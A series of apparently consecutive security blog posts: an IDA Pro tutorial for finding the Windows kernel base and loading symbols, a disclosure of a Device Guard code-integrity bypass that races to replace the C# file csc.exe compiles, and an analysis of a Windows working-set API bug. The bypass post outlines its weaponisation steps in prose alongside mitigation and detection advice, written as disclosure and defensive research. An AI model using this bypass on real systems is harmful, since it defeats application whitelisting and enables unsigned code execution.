    The first and most important thing is to discover where the NT Kernel (ntoskrnl.exe) is loaded in memory since it's not at any fixed (static) address thanks to address space layout randomization (ASLR).

    We are then able to force IDA Pro to load symbol data (PDBs) at ntoskrnl's base address to have useful debugging information. From there, we can enumerate the linked list, nt!PsLoadedModuleList, to figure out where other kernel mode components are located. However, this isn't trivial. When you break in to IDA Pro's GDB debugger, it's difficult to know what state you'll be in on any given processor. You might be executing code in a usermode process, or you might be busy servicing a system call. Additionally, you're further restricted to the functionality the GDB stub exposes.

    Enter the _KPCR

    On all architectures and versions of Windows, each processor maintains a control structure dubbed as the _KPCR (Kernel Processor Control Region). This structure is massive and it can be used to infer exactly what the processor is doing. On Windows 10 (15063.0.amd64fre.rs2_release.170317-1834), the _KPCR is 0x6bc0 bytes large. It contains many kernel pointers that we can leverage to figure out exactly where the base of ntoskrnl is in memory. A link detailing the members of the _KPCR can be found here.

    This structure can be accessed through its virtual address or through the fs segment on x86 and the gs segment on x64. In fact, if you've done any reverse engineering of the Windows kernel, you should have seen many examples of Windows itself accessing members of the _KPCR through the segment selector.

    For example, when an int 3 (a software breakpoint; 0xCC) is executed by the processor, control is redirected by the CPU to a handler registered in the appropriate position of the IDT (Interrupt Descriptor Table). We'll touch more on this process later. In Windows, the handler for software breakpoints is nt!KiBreakpointTrap. Here is a snippet of the assembly code of the handler under AMD64:

    In particular, at address 0x00000001401749FD we see a swapgs instruction. Since the gs selector means different things in user-mode (_TEB) and the kernel (_KPCR), this instruction is utilized to ensure that we're operating on the kernel-mode construct (_KPCR). Immediately following that instruction at address 0x0000000140174A00, we have an access of the gs segment with a mov r10, gs:188h. The astute reader will realize that upon execution of this instruction, r10 will contain the pointer from the _KPCR.Prcb.CurrentThread. This is discerned from the definition of the structure's members posted above. A breakdown of this process can be illustrated below:

    We don't know the _KPCR's exact linear address (it too isn't allocated at a fixed location), but we should be able to access it through the segment selector, though, just like the Windows kernel does. This approach might seem like the ideal one, but, unfortunately, we're further restricted by the functionality of the GDB stub. Let's see what the GDB stub exposes by issuing help:


    There are only three major commands available: help, r, and linuxoffsets. We've just executed help, and linuxoffsets isn't relevant to us since we're debugging a Windows kernel. The only other command is r. At first, r looks very useful to us. However, on closer examination, we can see that the GDB stub is unable to read arbitrary offsets off of the gs selector, e.g. the _KPCR.Prcb.CurrentThread from gs:188h by executing r gs:188h.

    At least executing r gs without an offset produces data:

    This command should get us the base of the gs selector. We then should be able to define a _KPCR structure at that location using IDA Pro. According to the GDB stub, though, our base is 0. If we go to that memory location in the "IDA View - RIP" tab by pressing 'G' and entering 0 in the "Jump to address" window, we don't see anything there:

    What changed from x86 to x64?

    If you ran this test on a VM running on an x86 (32-bit) version of Windows and substituted fs for gs, the base of the fs selector would not be 0. It would be a valid memory location. You would then have the address of the _KPCR and could continue on your merry way.

    Unfortunately, you're a sucker for pain and are following this tutorial down to the T. In 64-bit (long) mode on x64, the cs, ss, ds, and es segment selectors have a zero-forced base address. gs and fs are the exceptions and have a non-zero base address. So, how is it possible that the base of the gs selector is 0 when Windows itself uses the segment selector to retrieve processor state?

    The answer is in the model-specific registers, MSRs. MSRs are per-processor registers that can be read via rdmsr and written via wrmsr instructions. On x64, the IA32_GS_BASE (0xC0000101) and IA32_KERNEL_GS_BASE (0xC0000102) MSRs are used for storage of the base address of the gs selector. swapgs was introduced to exchange the address of the current gs base register with the value contained in the IA32_KERNEL_GS_BASE MSR.

    This means that we could, theoretically, read the IA32_GS_BASE MSR if we're executing code in CPL0 (ring0/kernel-mode). This would get us the base address of the gs segment. However, that's not directly possible through the VMware GDB stub. There is no support for reading or writing to MSRs directly.

    A shimmer in the shadows

    Nevertheless, through persistence, we come up with an approach that plays nicely given our constraints. There are multiple ways to skin a cat and this approach may not be the most elegant solution, but it should work nicely for all x64 Windows kernels.

    The basic idea is to leverage the IDT, the interrupt descriptor table, to find a symbol that's in the address space of ntoskrnl. We can access the idtr, a register that houses the IDT, through the GDB stub:

    Once we have the base of the IDT, in our case 0xfffff802c4850000, we can access the first entry of the IDT. This should resolve to a symbol within ntoskrnl (nt!KiDivideErrorFault):

    From there, we can walk kernel memory backwards until we get to a valid PE header. Since the symbol is contained within ntoskrnl's address space, the first valid PE header should belong to ntoskrnl:


    Figure 1: Layout of kernel memory. 

    Writing an IDA script using IDAPython

    It'd be nice to programmatically implement the algorithm described above so we don't need to manually go through it each time we're trying to discover the base address of ntoskrnl. We'll do this by writing a script for IDA Pro to run. I chose to do this with IDAPython instead of IDC (IDA's C-like bindings) because of the niceties that Python provides (like string manipulation).

    The basics

    We'll start by switching the input from "GDB" to "Python" in the "Output window". If your "Output window" is missing, you can restore it by selecting "Windows" and then "Output window" from the menu bar:


    We can see all the functionality exposed by IDAPython by executing the Python command dir() in the text box. If you try to do this, you'll see lots of output. It's easy to feel overwhelmed. Luckily, there exists amble documentation on the Hex-Rays website that can help us navigate these murky waters. 

    I try to find useful things by searching for it first in the dir() listing. You can position your cursor in the "Output window" and press Alt+T to search for a keyword. To find the next occurrence, you can hit Ctrl+T. If this fails, I move on to the documentation.

    Sending a command to the GDB stub

    Our first task is to figure out how to send a command to the GDB stub. If you search for the "command" keyword  in the "Output window" you'll find something labeled "SendDbgCommand". Let's see what this function does by executing help(SendDbgCommand):

    It seems very relevant to us. Let's give it a try:

    Looks like it's working. This is the same output we received from the GDB stub when we issued the help command.

    Parsing the response from the GDB stub

    Now that we know how to send a command to the GDB stub, we need to issue a command to retrieve the contents of the idtr. We then parse and extract the base address from the resulting string.

    It's important to tell Python that we're working with an integer object by "casting" the string to an integer-type:

    Easy!

    Getting the first IDT entry's handler

    We have the base of the IDT in idt_base. Our next task is to retrieve the first entry in the IDT. The IDT is effectively an array that contains 256 IDT entries (0-0xFF) on x64. The format of the IDT is dictated by the architecture of the processor (e.g. Intel x64). Each IDT entry on x64 takes the following form:

    To get to the handler (e.g. where the processor moves control to when an interrupt occurs), the target address is built from the OffsetHigh, OffsetMiddle, and OffsetLow fields of this structure using the following algorithm: HandlerAddress = ((OffsetHigh << 32) + (OffsetMiddle << 16) + OffsetLow).

    We'll leverage the Dbg* commands to read virtual memory from IDAPython. Since we're extracting the first IDT entry, we can just read directly from the start of our idt_base:

    This shows us that the handler for the first IDT entry (nt!KiDivideErrorFault) is loaded at 0xfffff802c27f4300. If we wanted to read the N'th IDT entry, we'd have to index into the array by adding 0x10, the size of a _KIDTENTRY64, times the location in the array (in this case N). So, to index into the 3rd IDT entry, we'd apply the following math: idt_entry = idt_base + (0x10 * 2).

    Finding the base address from a symbol within ntoskrnl

    First, we'll define a simple helper function that will align addresses to their page boundaries. This will help speed up our lookup because we know that the base address of ntoskrnl will be on a page boundary:

    We'll then create a very simple loop to walk memory backwards (on a page-aligned boundary) searching for the magical value 0x5A4D, commonly known as 'MZ' (IMAGE_DOS_SIGNATURE). This value signifies the start of the IMAGE_DOS_HEADER which is also the base address of an image:

    Voila! The base address of ntoskrnl is discovered at 0xfffff802c2680000.

    Creating the final version of the script

    After some refactoring and code tidying (including error checking), we produce a much better version of the script. This does the same thing as the commands we inserted in the IDAPython "Output window":

    Save a copy of the script to your local drive. We are then able to run it at any time by going to "File" and then "Script file..." in the IDA Pro GUI. A sample of the output is listed below:

    The important line appears on the bottom; the base address of ntoskrnl is displayed. It checks out with the work we did by hand too.

    Loading ntoskrnl at its base address

    We mustn't forget the final objective: loading kernel symbols. We're almost at the finish line. Let's tell IDA to load ntoskrnl at the base address our script found.

    First, we'll need to grab a copy of ntoskrnl on the VM. Don't use the version on your host as this may not match with what's on the VM. This'll be found in your guest's system directory:


    You might need to resume your VM if you're currently active in IDA's GDB debugger by selecting "Debugger" and then "Continue process" (or by hitting F9) from the menu bar.

    After you've pulled ntoskrnl from your VM, break into IDA's GDB debugger by selecting "Suspend". Now, we must load it by selecting "File" then "Load file" and finally "PDB file..."


    Find where you copied ntoskrnl to on your host and use the address that the script found:


    It'll take IDA at least a couple of minutes to fully finish the loading process. You can see IDA's progress in the bottom left corner:


    You'll know IDA's finished when the status changes to "AU: idle".


    Quick validation

    We should make sure that the symbols are loaded correctly. Navigate to "Jump" and then "Jump to address" (or press "G"). Enter PsLoadedModuleList (case sensitive) and hit "OK".


    From there, double click the address immediately to the right of the PsLoadedModuleList symbol. This takes you to the first entry in the list. 


    Each entry in this list is of type _LDR_DATA_TABLE_ENTRY. You might be familiar with this structure from usermode programming. It's also used in the kernel.

    We'll need to add the definition of the _LDR_DATA_TABLE_ENTRY to IDA's structures. Luckily, we have symbols loaded and this is a pretty straightforward process. 


    After the structure was added, you'll see a window similar to this. 


    Go back to the "Debug View". Impose the _LDR_DATA_TABLE_ENTRY structure on that memory region:


    Let's follow the FullName.Buffer field:


    And now let's convert this to a readable string:


    You should see the characters \SystemRoot\system32\ntoskrnl.exe. We did it!

    Final thoughts

    Now that symbols are loaded for ntoskrnl, it would be wise to iterate through the PsLoadedModuleList and load symbols for all the other kernel mode components. This can be scripted using IDAPython too, however, it's beyond the scope of this article.

    Cheers!

    Bypassing Device Guard with .NET Assembly Compilation Methods

    10 July 2017 at 11:08
    Tl;dr

    This post will describe a Device Guard user mode code integrity (UMCI) bypass (or any other application whitelisting solution for that matter) that takes advantage of the fact the code integrity checks are not performed on any code that compiles C# dynamically with csc.exe. This issue was reported to Microsoft on November 14, 2016. Despite all other Device Guard bypasses being serviced, a decision was made to not service this bypass. This bypass can be mitigated by blocking csc.exe but that may not be realistic in your environment considering the frequency in which legitimate code makes use of these methods - e.g. msbuild.exe and many PowerShell modules that call Add-Type.

    Introduction

    When Device Guard enforces user mode code integrity (UMCI), aside from blocking non-whitelisted binaries, it also only permits the execution of signed scripts (PowerShell and WSH) approved per policy. The UMCI enforcement mechanism in PowerShell is constrained language mode. One of the features of constrained language mode is that unsigned/unapproved scripts are prevented from calling Add-Type as this would permit arbitrary code execution via the compilation and loading of supplied C#. Scripts that are approved per Device Guard code integrity (CI) policy, however, are under no such restrictions, execute in full language mode, and are permitted to call Add-Type. While investigating Device Guard bypasses, I considered targeting legitimate, approved calls to Add-Type. I knew that the act of calling Add-Type caused csc.exe – the C# compiler to drop a .cs file to %TEMP%, compile it, and load it. A procmon trace of PowerShell calling Add-Type confirms this:

    Process Name Operation  Path

    ------------ ---------  ----

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.cmdline

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.0.cs

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp

    cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP

    cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.dll

    csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP


    Upon seeing these files created, I asked myself the following questions:
    1. Considering an approved (i.e. whitelisted per policy) PowerShell function is permitted to call Add-Type (as many Microsoft-signed module functions do), could I possibly replace the dropped .cs file with my own? Could I do so quickly enough to win that race?
    2. How is the .DLL that’s created loaded? Is it subject to code integrity (CI) checks?

    Research methodology
    Let’s start with the second question since exploitation would be impossible if CI would prevent the loading of a hijacked, unsigned DLL. To answer this question, I needed to determine what .NET methods were called upon Add-Type being called. This determination was relatively easy by tracing method calls in dnSpy. I quickly traced execution of the following .NET methods:
    Once the Microsoft.CSharp.CSharpCodeGenerator.Compile method is called, this is where csc.exe is ultimately invoked. After the Compile method returns, FromFileBatch takes the compiled artifacts, reads them in as a byte array, and then loads them using System.Reflection.Assembly.Load(byte[], byte[], Evidence). This is the same method called by msbuild.exe when compiling inline tasks – a known Device Guard UMCI bypassed discovered by Casey Smith. Knowing this, I gained the confidence that if I could hijack the dropped .cs file, I would end up having a constrained language mode bypass, allowing arbitrary unsigned code execution. What we’re referring to here is known as a “time of check time of use” (TOCTOU) attack. If I could manage to replace the dropped .cs file with my own prior to csc.exe consuming it, then I would win that race and perform the bypass. The only constraints imposed on me, however, would be that I would need to write a hijack payload within the constraints of constrained language mode. As it turns out, I was successful.

    Exploitation

    I wrote a function called Add-TypeRaceCondition that will accept attacker-supplied C# and get an allowed call to Add-Type to compile it and load it within the constraints of constrained language mode. The weaponized bypass is roughly broken down as follows:
    1. Spawn a child process of PowerShell that constantly tries to drop the malicious .cs file to %TEMP%.
    2. Maximize the process priority of the child PowerShell process to increase the likelihood of winning the race.
    3. In the parent PowerShell process, import a Microsoft-signed PowerShell module that calls Add-Type – I chose the PSDiagnostics process for this.
    4. Kill the child PowerShell process.
    5. At this point, you will have likely won the race and your type will be loaded in place of the legitimate one expected by PSDiagnostics.
    In reality, the payload wins the race a little more than 50% of the time. If Add-TypeRaceCondition doesn’t work on the first try, it will almost always work on the second try.

    Do note that while I weaponized this bypass for PowerShell, this can be weaponized using anything that would allow you to overwrite the dropped .cs file quickly enough. I've weaponized the bypass using a batch script, VBScript, and with WMI. I'll leave it up to the reader to implement a bypass using their language of choice.

    Operational Considerations

    It's worth noting that while an application whitelisting bypass is just that, it also serves as a method of code execution that is likely to evade defenses. In this bypass, an attacker need only drop a C# file to disk which results in the temporary creation of a DLL on disk which is quickly deleted. Depending upon the payload used, some anti-virus solutions with real-time scanning enabled could potentially have the ability to quarantine the dropped DLL before it's consumed by System.Reflection.Assembly.Load.

    Prevention

    Let me first emphasize that this is a .NET issue, not a PowerShell issue. PowerShell was simply chosen as a convenient means to weaponize the bypass. As I’ve already stated, this issue doesn’t just apply to when PowerShell calls Add-Type, but when any application calls any of the CodeDomProvider.CompileAssemblyFrom methods. Researchers will continue to target signed applications that make such method calls until this issue is mitigated.

    A possible user mitigation for this bypass would be to block csc.exe with a Device Guard rule. I would personally advise against this, however, since there are many legitimate Add-Type calls in PowerShell and presumably in other legitimate applications. I’ve provided a sample Device Guard CI rule that you can merge into your policy if you like though. I created the rule with the following code:

    # Copy csc.exe into the following directory

    # csc.exe should be the only file in this directory.

    $CSCTestPath = '.\Desktop\ToBlock\'

    $PEInfo = Get-SystemDriver -ScanPath $CSCTestPath -UserPEs -NoShadowCopy


    $DenyRule = New-CIPolicyRule -Level FileName -DriverFiles $PEInfo -Deny

    $DenyRule[0].SetAttribute('MinimumFileVersion', '65535.65535.65535.65535')


    $CIArgs = @{

        FilePath = "$($CSCTestPath)block_csc.xml"

        Rules = $DenyRule

        UserPEs = $True

    }


    New-CIPolicy @CIArgs


    Detection

    Unfortunately, detection using free, off-the-shelf tools will be difficult due to the fact that the disk artifacts are created and subsequently deleted and by the nature of System.Reflection.Assembly.Load(byte[]) not generating a traditional module load event that something like Sysmon would be able to detect.

    Vendors with the ability to hash files on the spot should consider assessing the prevalence of DLLs created by csc.exe. Files with low prevalence should be treated as suspicious. Also, unfortunately, since dynamically created DLLs by their nature will not be signed, there will be no code signing heuristics to key off of.

    It's worth noting that I intentionally didn't mention PowerShell v5 ScriptBlock logging as a detection option since PowerShell isn't actually required to achieve this bypass.

    Conclusion

    I remain optimistic of Device Guard’s ability to enforce user mode code integrity. It is a difficult problem to tackle, however, and there is plenty of attack surface. In most cases, Device Guard UMCI bypasses can be mitigated by a user in the form of CI blacklist rules. Unfortunately, in my opinion, no realistic user mitigation of this particular bypass is possible. Microsoft not servicing such a bypass is the exception and not the norm. Please don’t let this discourage you from reporting any bypasses that you may find to [email protected]. It is my hope that by releasing this bypass that it will eventually be addressed and it will provide other vendors with the opportunity to mitigate.

    Previously serviced bypasses for reference:

    Breaking backwards compatibility: a 5 year old bug deep within Windows

    By: Nemi
    20 July 2017 at 23:48
    Microsoft has a great track record of maintaining support for legacy software running under Windows. There is an entire compatibility layer baked into the OS that is dedicated to fixing issues with decades old software running on modern iterations of Windows. To learn more about this application compatibility infrastructure, I'd recommend swinging over to Alex Ionescu's blog. He has a great set of posts describing the technical details on how user (even kernel) mode shimming is implemented.

    With all of that said, it's an understatement to say that Microsoft takes backwards compatibility seriously. Occasionally, the humans at Microsoft make mistakes. Usually, though, they're very quick to address these problems.

    This blog post will go over an unnoticed bug that was introduced in Windows 8 with a documented Win32 API. At the time of this post, this bug is still present in Windows 10 (Creator's Update) and has been around for over 5 years.

    Forgotten Win32 APIs

    There is a set of Win32 APIs that were introduced in Windows XP to monitor the working set of a process. A process' working set is a collection of pages, chunks of memory, that are currently in RAM (physical memory) and are accessible to that process without inducing a page fault. In particular, the APIs of interest for us are InitializeProcessForWsWatch and GetWsChanges/GetWsChangeEx.

    After reading the MSDN documentation, it's easy to discover what the intended use for these APIs were. These APIs profile the number of page faults that occur within a process' address space. 

    What's a page fault? A quick recap.

    There are 3 general categories of page faults. 

    A hard page fault occurs when memory is accessed that's not currently in RAM (physical). In situations like this, the OS will need to retrieve the memory from disk (e.g. pagefile.sys) and make it accessible to the faulting process. 

    A soft page fault occurs when memory is in RAM (physical), but not currently accessible to the process that induced the fault. This memory might be shared amongst multiple processes and the process that caused the page fault might not have it mapped into its working set. These types of page faults are much more performant than hard page faults as there is no disk I/O conducted. 

    The last and final type of page fault is known formally as an invalid fault. These can also be referred to as access violations. This can be caused when a program, for example, tries to access unallocated memory or tries to write to memory that's marked read-only.

    Paging is necessary to make modern operating systems work. You probably have many processes running on your system, but not nearly enough RAM to hold all the possible contents of each process into physical memory. To learn more about paging, I strongly recommend this article posted by my colleague.

    Demo 

    The best way to illustrate what's broken is through an example. I created two simple programs. 

    The first application, WorkingSetWatch.exe, implements the InitializeProcessForWsWatch and GetWsChangeEx APIs. This application logs when a specific memory region is paged into our process' working set:

    The second application, ReadProcessMemory.exe, implements reading of an arbitrary memory blob from another target process' memory space:

    The basic idea is to use ReadProcessMemory.exe to read from the monitored memory address inside of WorkingSetWatch.exe. This will induce a page fault.

    Windows 7: Build 7601 (SP1)

    The WorkingSetWatch.exe application works as expected. We're able to read any (valid) sized buffer using ReadProcessMemory.exe and log it.


    Windows 10: Build 15063 (Creator's Update)

    Unfortunately, WorkingSetWatch.exe does not seem to log the page fault that occurs when our remote application, ReadProcessMemory.exe, reads a buffer greater than or equal to 512 bytes; however, it does seem to work as expected when a read occurs that's less than 512 bytes.


    This renders these working set APIs useless for profiling reasons on Windows 8+.

    What went wrong?

    To determine what went wrong, we'll need to reverse engineer parts of Windows and see exactly how the implementation changed in Windows 8+ from Windows 7.

    All disassembly and pseudo-source is reconstructed from system files that are provided with Windows x64 10.0.15063 (Creator's Update).

    Enabling process working set logging

    To enable working set logging for a process, we need to call InitializeProcessForWsWatch. From the MSDN documentation, we're told that on newer versions of Windows this API is exported as K32InitializeProcessForWsWatch within kernel32.dll. Our analysis begins there:

    This function is very simple. It invokes an import from another library. In this case, it executes a function of the same name (K32InitializeProcessForWsWatch), but contained within a different library, api-ms-win-core-psapi-l1-1-0.dll. This library doesn't exist on disk, but rather resolves to an API Set mapping corresponding to kernelbase.dll (which does exist on disk) for this version of Windows. A look into kernelbase.dll's implementation shows that a call to NtSetInformationProcess is performed without any parameter marshalling:

    Our next target is NtSetInformationProcess within ntdll.dll:

    This is just a simplistic syscall stub that will eventually make its way into the implementation contained within ntoskrnl.exe, the Windows kernel. nt!NtSetInformationProcess is a massive function that contains a huge switch statement that supports all the different PROCESSINFOCLASS that can be passed to it.


    We're interested in the PROCESSINFOCLASS for ProcessWorkingSetWatch. This is case 15 (0xF). A snippet of the relevant parts (with the cleaned-up disassembly):

    It's interesting to note that you're able to start monitoring on a process' working set with either a class of ProcessWorkingSetWatch (15) or ProcessWorkingSetWatchEx (42). This can be achieved by invoking nt!NtSetInformationProcess directly instead of going through the documented route with kernel32!InitializeProcessForWsWatch. The latter utilizes only the ProcessWorkingSetWatch class.

    The actual logic of nt!NtSetInformationProcess is pretty trivial to understand. A blob of memory is allocated per process that we're monitoring. This blob of memory is a _PAGEFAULT_HISTORY structure and contains up to 1024 _PROCESS_WS_WATCH_INFORMATION structures internally. Each _PROCESS_WS_WATCH_INFORMATION structure is an entry that describes a page fault. These entries will be cycled through as the array fills up. Recall from the MSDN documentation (the "Remarks" section) that you must call GetWsChanges/Ex with enough frequency to avoid record loss. This makes perfect sense because we can see that there are a fixed number of these records (1024) allocated. I took the liberty of documenting these structures:

    The union at the beginning of the _PAGEFAULT_HISTORY structure may be a little confusing, but it'll be explained later.

    On successful execution of this routine, the monitored process object will have an internal member (_EPROCESS.WorkingSetWatch) updated to include this recently allocated _PAGEFAULT_HISTORY pointer. Additionally, the PsWatchEnabled global will be set. This value informs the system to track page faults for processes. It will remain set until the system reboots (even if there are no processes running that have working sets tracked). There are only 2 references to PsWatchEnabled and we've already inspected the one in nt!NtSetInformationProcess.


    Our investigation leads us to nt!KiPageFault.

    Logging a page fault

    When a page fault occurs, the CPU transfers execution to nt!KiPageFault:

    If the PsWatchEnabled global is set, that means we've enabled working set logging for processes on the system and execution is passed to nt!PsWatchWorkingSet. This function is documented below:

    As I mentioned above, there are 3 types of page faults. Access violations are not logged to our process' working set due to an early out by nt!MmAccessFault in nt!KiPageFault. Since this function is executed for the other 2 types of page faults (hard and soft) on the system, it will be accessed heavily by the operating system. Luckily, one of the first things the routine does is check whether or not a working set watch was enabled on the process where the page fault occurred. If there is no working set watch on the process, the routine completes.

    As per the documentation, nt!PsWatchWorkingSet will not function while records are being processed (EntrySelector.Busy). We'll describe this part in depth at a later time. Since higher priority interrupts can preempt our working set monitor, most of the logic in this routine needs to have adequate sanity (safety) checks and complete as atomically (Interlocked*** operations) as possible. The first part of the function will safely select a free index in the _PAGEFAULT_HISTORY.WatchInfo array that it can use for logging purposes. If the array is full (there can be at most 1024 entries), a "miss" is recorded (_PAGEFAULT_HISTORY.MissingRecords) and the routine completes. If everything is successful, a page fault event is recorded in a free slot in the _PAGEFAULT_HISTORY.WatchInfo array. An interesting (and undocumented) feature changes the entry's _PROCESS_WS_WATCH_INFORMATION.FaultingVa least significant bit to 0 if a hard page fault occurred and 1 if a soft page fault occurred.

    Ultimately, there doesn't seem to be any apparent bugs with this code. Additionally, this code matches very closely to the Windows 7 version which we know works. Our investigation leads us to the working set watch retrieval functions: GetWsChanges/Ex.

    Querying working set logging

    For article brevity, I'll give a quick summary of the call-flow of kernel32!GetWsChanges (kernel32!K32GetWsChanges) and kernel32!GetWsChangesEx (kernel32!K32GetWsChangesEx). These functions will call into their kernelbase.dll variants. From there, they will branch into kernelbase!GetWsChangesInternal which will invoke ntdll!NtQueryInformationProcess with the appropriate PROCESSINFOCLASS. In particular, the ProcessWorkingSetWatch class will be used for the GetWsChanges family of functions and ProcessWorkingSetWatchEx will be used for the others. From ntdll!NtQueryInformationProcess, a syscall will be made. This makes it to the implementation of NtQueryInformationProcess within the kernel. A massive switch statement awaits:

    The part that interests us resides one level deeper within nt!PspQueryWorkingSetWatch:

    There's some input validation (e.g. alignment checks) and a safety check (nt!ExIsRestrictedCaller) to avoid kernel pointer leaks in low integrity processes. After that, the process object is retrieved from the supplied process handle. The operating system checks to see that the _EPROCESS.WorkingSetWatch member is set. Just like the documentation states, at most one query can access a process' working set buffer at a time (EntrySelector.Busy). Additionally, while the buffer is being accessed, logging (by nt!PsWatchWorkingSet in nt!KiPageFault) will produce misses.

    As long as there's enough space in the user supplied buffer, the operating system will copy over the entry array to the user supplied buffer. The data will be structured in the appropriate way for the appropriate PROCESSINFOCLASS. The last entry in the user supplied buffer (PSAPI_WS_WATCH_INFORMATION/EX) will be terminated with a FaultingPc member of NULL. Additionally, the number of "misses" will be recorded in the FaultingVa member of the last entry.

    Finally, the _PAGEFAULT_HISTORY.WatchInfo array of the _EPROCESS.WorkingSetWatch will be reset after a successful call.

    /rant.

    The InitializeProcessForWsWatch and GetWsChanges/Ex APIs are surprisingly very finicky. There are many weird restrictions and caveats which make it surprisingly difficult for developers to retrieve information regarding the complete set of page faults that occurred within a process.

    There is a very good chance that you will run into situations where records will wind up missing especially in a multi-processor and multi-threaded environment. For example, if a thread is querying the working set of a process, but a page fault occurs on another thread within that same process, a miss could be recorded since the _PAGEFAULT_HISTORY.Busy member will be acquired by nt!PspQueryWorkingSetWatch. This will prevent the page fault logging logic in nt!PsWatchWorkingSet. Functionally, this weakens the usability of the API for profiling purposes. To compound this problem, only 1024 entries can be stored in the array between calls of GetWsChanges/Ex. That's at most 4 MB (1024*PAGE_SIZE) of page fault history. This really isn't enough for modern applications which can be very complex.

    In our specific situation, we ran our tests on a VM that had 1 processor allocated to it. Furthermore, our application was simple enough that it had 1 thread. This mitigates the chance of page fault "misses". Additionally, after a thorough investigation of the working set APIs, we've concluded that we've still not discovered where the bug is. In particular, why does the buffer size play a role in the success of these APIs? In our demo, we were unable to log page faults on Windows 10 when the buffer size was greater than or equal to 512 bytes. Is it possible that the bug is not within WorkingSetWatch.exe, but rather ReadProcessMemory.exe?

    To continue our investigation, we need to turn to ReadProcessMemory.exe.

    Reading memory

    The ReadProcessMemory.exe application is simple enough to understand. We know that we're not logging a page fault when we're reading a buffer that is greater than or equal to 512 bytes. Since there is no apparent bug in the working set APIs, the problem most likely resides in kernel32!ReadProcessMemory.

    I'll step past the irrelevant details, but the same strategy is applied as was in the previous parts. In particular, kernel32!ReadProcessMemory calls into kernelbase!ReadProcessMemory. These functions do nothing special and more-or-less directly issue a system call by invoking ntdll!NtReadVirtualMemory. This takes us to the implementation of nt!ReadVirtualMemory in the kernel:

    This function just invokes nt!MiReadWriteVirtualMemory. On some versions of ntoskrnl, this routine may just be inlined into the caller's body.

    Aside from a check that prevents reading and writing to protected processes (ProcessObject->Pcb.SecurePid), this function is nearly identical to the one in the Windows 7 kernel. We need to go deeper. We traverse into nt!MmCopyVirtualMemory.

    This function is massive. It contains many subfunctions that have been inlined. For article brevity, the important parts of nt!MmCopyVirtualMemory will be highlighted. One of the first things that this routine does is search for VAD entries that corresponds to the input addresses (FromAddress and ToAddress). The idea is to leverage the "region size" information for memory, but this isn't really relevant to our bug. We'll leave the discussion of the VAD (Virtual Address Descriptor) to another time.

    nt!MmCopyVirtualMemory's next task is to determine the input buffer's length. In particular, there are a couple checks against the buffer length and the value 512. This is significant to us because we know the bug only seems to manifest when the buffer size is greater than or equal to 512 bytes.

    Basically, it seems that if the buffer is greater than or equal to 512 bytes, nt!MmCopyVirtualMemory will utilize nt!MmProbeAndLockPages and nt!MmMapLockedPagesSpecifyCache followed by a memcpy to clone over memory.

    If the buffer is less than 512 bytes, nt!MmCopyVirtualMemory will just leverage memcpy directly by using a buffer on the stack or a buffer allocated in dynamic memory (based on buffer size) via nt!ExAllocatePoolWithTag.

    This is probably done for performance reasons. Larger memory copies probably benefit from direct mapping instead of memory pool copying. If we do leverage memory pool copying (buffers that are less than 512 bytes in size), we trigger a page fault and the event is logged by our WorkingSetWatch.exe application. On the other hand, if we leverage a direct mapping to copy memory, we do not trigger a page fault.

    One incorrect assumption is to believe that on Windows 7 this optimization did not exist. On the contrary, there is very similar logic inside of the older version of nt!MmCopyVirtualMemory. However, something did change, otherwise we would not have any discrepancies with our WorkingSetWatch program. Our investigation leads us into nt!MmProbeAndLockPages.

    The bug: an optimization in nt!MmProbeAndLockPages

    The implementation of nt!MmProbeAndLockPages underwent drastic changes between Windows 7 to now. If you looked at these two functions side-by-side, you'd quickly notice that the Windows 7 implementation was in some ways much simpler.

    The purpose of nt!MmProbeAndLockPages (per the documentation) is to ensure that the specified virtual pages (in the argument contained within MemoryDescriptorList) are backed by physical memory. Additionally, there is a series of permission checks to ensure that the virtual pages permit the user-specified access rights. In Windows 7, to perform this access check, the routine actually "probed" the memory by directly accessing it. This would induce a page fault in the context of the correct process and therefore we'd be able to log it using our WorkingSetWatch.exe application.

    On Windows 10, this process was optimized. Instead of accessing the memory directly, a PTE (Page Table Entry) walk is performed to ensure that the correct permissions exist. This change makes the process more efficient especially since the PTEs are leveraged to lock the memory into physical pages anyway.


    OS development isn't easy

    One seemingly inconspicuous change can break functionality in an entirely unrelated part of the operating system. In our case, an optimization in the underlying logic of how nt!MmProbeAndLockPages functioned broke backwards compatibility of the working set APIs. This bug seems to be entirely unnoticed, but it unfortunately renders the performance profiling nature of the GetWsChanges/Ex APIs useless. 

    A potential fix for Microsoft is to simply just throw a page fault for "invalid" pages if the PsWatchEnabled global is set or, more granularly, if a process' _EPROCESS.WorkingSetWatch is set.

    Exploring Windows virtual memory management

    14 August 2017 at 03:23
    In a previous post, we discussed the IA-32e 64-bit paging structures, and how they can be used to turn virtual addresses into physical addresses. They're a simple but elegant way to manage virtual address mappings as well as page permissions with varying granularity of page sizes. All of which is provided by the architecture. But as one might expect, once you add an operating system like Windows into the mix, things get a little more interesting.

    The problem of per-process memory

    In Windows, a process is nothing more than a simple container of threads and metadata that represents a user-mode application. It has its own memory so that it can manage the different pieces of data and code that make the process do something useful. Let's consider, then, two processes that both try to read and write from the memory located at the virtual address 0x00000000`11223344. Based on what we know about paging, we expect that the virtual address is going to end up translating into the same physical address (let's say 0x00000001`ff003344 as an example) in both processes. There is, after all, only one CR3 register per processor, and the hardware dictates that the paging structure root is located in that register.

    Figure 1: If the two process' virtual addresses would translate to the same physical address, then we expect that they would both see the same memory, right?

